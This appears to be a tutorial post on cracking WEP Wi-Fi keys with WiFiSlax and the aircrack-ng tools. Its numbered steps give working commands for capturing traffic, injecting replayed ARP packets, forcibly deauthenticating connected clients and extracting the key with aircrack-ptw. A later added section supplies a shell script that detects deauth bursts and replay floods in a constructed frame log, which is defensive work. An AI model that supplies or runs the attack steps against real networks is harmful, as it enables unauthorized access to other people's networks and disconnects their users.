Requirements
Notebook with Intel Centrino chipset 2200 or above
WiFiSlax 3.1 (Download)
Cup of coffee with two biscuits ;p
Instructions
Download the WiFiSlax image and burn it to a CD
Boot the notebook from the CD
Log in as "root"; the password is "toor"
Once logged in, start X:
startx
Note: The interface on this CD is in Spanish; use Google Translate if needed
Step 1: Load Driver
To load the Intel driver, click K Menu > Asistencia Chipset > Asistencia Intel pro wireless > Cargar ipw3945 injection (depends on your chipset)
To find the target channel, use Kismet to scan all wireless networks (K Menu > Wifislax > Herramientas Wireless > Kismet)
Step 2: Start Capturing
Set the channel of the Access Point in the NIC:
echo 'Channel' > /sys/class/net/wifi0/device/channel
Scan all wireless networks to get the BSSID and the ESSID; type:
airodump-ng rtap0
Stop the scan with CONTROL-C
Set the BSSID in the NIC:
echo 'BSSID' > /sys/class/net/wifi0/device/bssid
Start capturing using the command:
airodump-ng -c CHANNEL -w /path/to/save/OUTPUT_FILE rtap0
Step 3: Inject Traffic
Capturing takes a while, so open a new terminal window and set the rate to 2 Mbps:
echo '2' > /sys/class/net/wifi0/device/rate
Activate the NIC:
ifconfig wifi0 up
Note your MAC address
Initiate an association with the Access Point:
aireplay-ng -1 0 -a AP_BSSID -h YOUR_MAC_ADDRESS_WIFI -e AP_ESSID wifi0
Start the traffic injection:
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h YOUR_MAC_ADDRESS_WIFI wifi0
This should increase the data count in the capture window.
Step 4: Deauthenticate clients if needed
Deauthenticate clients if needed to increase the number of ARP requests captured; type:
aireplay-ng -0 15 -a AP_BSSID -c CLIENT_MAC_ADDRESS_WIFI wifi0
Step 5: Apply Aircrack-PTW
When the data packet count is between 40,000 and 85,000+, extract the key by executing:
aircrack-ptw /path/to/save/OUTPUT_FILE.cap
and voilà:
Found key with len 05: XX XXXXXXXX
where XX XXXXXXXX is the WEP key
This is the manual method using WiFiSlax. I will show you an easy way to retrieve the WEP key using the same tool.
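Seen from the monitoring side, Steps 3 and 4 leave a clear trace: a flood of identical data frames from one station and a burst of deauthentication frames. The following added example (not part of the original post) counts frames per second over a constructed frame log and flags both; the log layout, MAC addresses, frame lengths and thresholds are all assumptions.

```shell
#!/bin/sh
# Constructed sample capture summary, one frame per line, in a hypothetical
# layout: epoch_second frame_type source_mac dest_mac length_bytes
sample_frames() {
  awk 'BEGIN {
    ap = "00:11:22:33:44:55"; sta = "02:00:00:00:00:10"; inj = "02:00:00:00:00:99"
    # Ordinary traffic: a few data frames of varying size.
    print 100, "data", sta, ap, 1420
    print 100, "data", ap, sta, 310
    print 100, "data", sta, ap, 92
    # Deauthentication burst aimed at one client (Step 4).
    for (i = 0; i < 30; i++) print 101, "deauth", ap, sta, 26
    # Replayed ARP request: the same frame, same length, hundreds of times
    # per second from a single station (Step 3).
    for (s = 102; s <= 103; s++)
      for (i = 0; i < 300; i++) print s, "data", inj, ap, 68
  }'
}

# detect_wep_attack DEAUTH_PER_SEC REPLAY_PER_SEC  (reads frames on stdin)
# Flags any second in which one source sends >= DEAUTH_PER_SEC deauth frames
# to one destination, or >= REPLAY_PER_SEC data frames of identical length.
detect_wep_attack() {
  awk -v dth="$1" -v rth="$2" '
    $2 == "deauth" { d[$1 " " $3 " " $4]++ }
    $2 == "data"   { r[$1 " " $3 " " $5]++ }
    END {
      for (k in d) if (d[k] >= dth) {
        split(k, f, " ")
        print "DEAUTH_BURST sec=" f[1] " src=" f[2] " dst=" f[3] " frames=" d[k]
      }
      for (k in r) if (r[k] >= rth) {
        split(k, f, " ")
        print "REPLAY_FLOOD sec=" f[1] " src=" f[2] " len=" f[3] " frames=" r[k]
      }
    }' | LC_ALL=C sort
}

# Thresholds are assumptions; tune them against a baseline of your own network.
sample_frames | detect_wep_attack 10 200
```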

